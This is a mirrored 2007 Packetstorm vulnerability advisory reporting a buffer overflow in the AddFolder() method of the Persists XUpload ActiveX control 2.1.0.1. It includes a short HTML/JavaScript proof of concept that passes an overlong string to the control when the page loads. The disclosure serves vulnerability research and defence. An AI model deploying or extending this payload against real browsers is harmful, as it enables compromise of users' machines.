Lucene search
K

persists-overflow.txt

🗓️ 28 Dec 2007 00:00:00Reported by Elazar BroadType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Buffer overflow in Persists Software XUpload control v2.1.0.

Code
`There is a buffer overflow in the AddFolder() method of the Persists Software XUpload control, version 2.1.0.1. This object is marked safe for scripting. Version 3.0(latest) is not vulnerable(throws an error if the parameter is more than 256 characters), I have not tested any other versions. A quick Google search for "xupload.ocx" shows that this control is widely deployed. PoC as follows:  
  
------------------  
<!--  
written by e.b.  
-->  
<html>  
<head>  
<script language="JavaScript" DEFER>  
function Check() {  
var s = 'A';  
  
while (s.length <= 1380) s = s + 'A';  
  
obj.AddFolder(s);  
  
}  
</script>  
  
</head>  
<body onload="JavaScript: return Check();">  
<object id="obj" classid="clsid:E87F6C8E-16C0-11D3-BEF7-009027438003" />  
</object>  
</body>  
</html>  
------------------  
  
Elazar  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Dec 2007 00:00Current
7.4High risk
Vulners AI Score7.4
19